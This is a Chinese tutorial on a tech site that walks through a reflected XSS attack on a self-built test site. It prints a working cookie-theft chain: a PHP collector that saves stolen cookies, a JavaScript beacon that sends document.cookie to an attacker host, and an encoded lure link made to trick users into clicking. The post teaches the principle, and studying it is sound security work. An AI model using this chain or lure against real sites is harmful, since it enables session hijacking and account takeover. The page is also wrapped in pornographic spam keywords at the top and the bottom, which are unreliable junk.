成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

反射型xss實戰演示

安全 應用安全
我們知道,XSS攻擊大致分為三種類型 :Persistent型(持久型),Non-persistent(反射型)及Dom-based型。而反射型是最常用,也是使用得最廣的一種攻擊方式。它通過給別人發送帶有惡意腳本代碼參數的URL,當URL地址被打開時,特有的惡意代碼參數被HTML解析、執行。它的特點是非持久化,必須用戶點擊帶有特定參數的鏈接才能引起。

我們知道,XSS攻擊大致分為三種類型 :Persistent型(持久型),Non-persistent(反射型)及Dom-based型。而反射型是最常用,也是使用得最廣的一種攻擊方式。它通過給別人發送帶有惡意腳本代碼參數的URL,當URL地址被打開時,特有的惡意代碼參數被HTML解析、執行。它的特點是非持久化,必須用戶點擊帶有特定參數的鏈接才能引起。

今天,通過一個反射型xss的實戰演示,讓大家詳細了解這種攻擊方式。

準備工作:

(1) 一個有反射型xss漏洞的網站(自己搭的虛擬站點,域名為xsstest.qq.com),該域名下有一個首頁(index.html),一個登陸頁面(login.html),一個登陸的cgi(login.php),一個用于搜索的cgi(search.php)。界面如下:

 

 

由于xss漏洞一般發生于與用戶交互的地方,因此搜索框是我們關注的重點。

(2)我們自己的黑客網站(另一個虛擬站點 hacker.qq.com)。該域名下有一個hack.php,用以收集用戶的cookie,一個hacker.js用以向hack.php發請求。

發現漏洞

我們首先需要找出站點的xss漏洞發生在什么地方,上面提到,與用戶交互的地方是我們的主要關注點。。好,現在我們隨意輸入幾個字符“計算機”,點擊搜索:

搜索界面如下(這是自己寫的一個簡陋的搜索界面):

 

 

這里發現了我們輸入的字符出現在了搜索界面上(很多電商網站應該都是這種界面頁面形式吧)。。好,這次我們輸入一些特殊字符來試試“”,點擊搜索:

 

 

出現了我們心儀的小彈窗,看來search.php未對用戶輸入的關鍵詞作任何處理,便直接輸出到界面上,既然xss漏洞出現,那么便可以開始實施攻擊了,這次攻擊的目的是盜取用戶的cookie。

實施攻擊

首先我們來寫我們自己的手機cookie CGI(hack.php),代碼如下:

  1. <?php 
  2. $cookie = $_GET['q']; 
  3. var_dump($cookie); 
  4. $myFile = "cookie.txt"
  5. file_put_contents($myFile$cookie); 
  6. ?> 

接著寫發送請求的hacker.js,代碼如下:

var img = new Image();
img.src = "http://hacker.qq.com/hack.php?q="+document.cookie;
document.body.append(img);

好的,現在可以構造一個連接來欺騙用戶了:

<a href="http://xsstest.qq.com/search.php?q=%3Cscript+
src%3Dhttp%3A%2F%2Fhacker.qq.com%2Fhacker.js%3E%3C%2Fscript%3E&commend=
all&ssid=s5-e&search_type=item&atype=&filterFineness=&rr=
1&pcat=food2011&style=grid&cat=">點擊就送998</a> 

看search.php 后的q參數 ,解碼后為

<script src="http://hacker.qq.com/hacker.js"></script>

實際的作用是模擬用戶在搜索框中輸入

<script src="http://hacker.qq.com/hacker.js"></script>

后點擊搜索。search.php未經處理的將其直接輸入到頁面,使其在html文檔中有了新的語義。它會加載hacker.qq.com域下的haker.js。

好,當用戶登陸了網站后,再欺騙用戶點擊這個鏈接,這時候,看hacker.qq.com域下,發現多了一個cookie.txt文件,打開來:

 

 

發現用戶用于登陸的賬號,密碼都在內,密碼是經過加密的。。OK,現在我們便可以拿著這個cookie來獲取用戶的登陸態了。

整個攻擊過程結束。

當然,現實過程中,很少有網站有如此明顯的xss漏洞。。這里只是給大家示范了一下反射型xss的原理,現實中的漏洞雖然五花八門,但是本質是不變的。。大家可以進一步研究。

 

責任編輯:藍雨淚 來源: 博客
相關推薦

2019-03-25 07:27:14

XSS漏洞Ecshop

2012-11-08 14:55:10

2013-01-09 14:17:59

2013-11-27 17:12:27

2011-07-21 09:25:41

2014-04-15 17:03:00

2009-11-16 10:49:43

PHP上傳文件代碼

2023-03-02 07:37:53

2014-07-03 10:01:40

XSS漏洞存儲型XSS漏洞

2014-05-22 09:31:44

2015-02-01 09:26:10

2010-06-04 09:33:28

連接MySQL數據庫

2010-09-13 17:45:37

2024-03-12 09:50:27

Raft協議KRaft

2010-09-13 14:03:58

2010-06-02 14:42:57

MySQL四舍五入

2021-09-08 17:20:18

DockerDockerfile程序

2010-06-04 19:57:09

2010-06-09 13:02:29

MySQL啟用二進制日

2010-06-13 14:49:02

MySQL創建遠程登陸
點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 亚洲电影成人 | 色久电影| 欧美精品在线一区二区三区 | 色综合久久久久 | 亚洲精品乱码久久久久久9色 | 国产美女在线播放 | 午夜精品久久 | 国产精品美女久久久免费 | 日韩高清中文字幕 | 狠狠婷婷综合久久久久久妖精 | 日韩精品久久一区 | 99热精品国产| 在线 丝袜 欧美 日韩 制服 | www.日本三级| 国产精品无码永久免费888 | 欧美日韩视频 | 欧美视频三级 | 精品一二区 | 亚洲视频免费一区 | 精品视频网| 国产视频一区在线 | 国产精品片 | 337p日本欧洲亚洲大胆鲁鲁 | 日韩小视频 | 5060网一级毛片 | 天堂久久久久久久 | 日日噜噜噜夜夜爽爽狠狠视频, | www.日韩欧美 | 国精产品一品二品国精在线观看 | 午夜免费网站 | 97伦理电影 | 亚洲福利视频一区二区 | 亚洲精品av在线 | 精品国偷自产在线 | 亚洲国产视频一区二区 | 精品三级在线观看 | 日韩在线免费视频 | 免费一级黄色 | 999久久久久久久久6666 | 一区二区国产在线观看 | 成人教育av |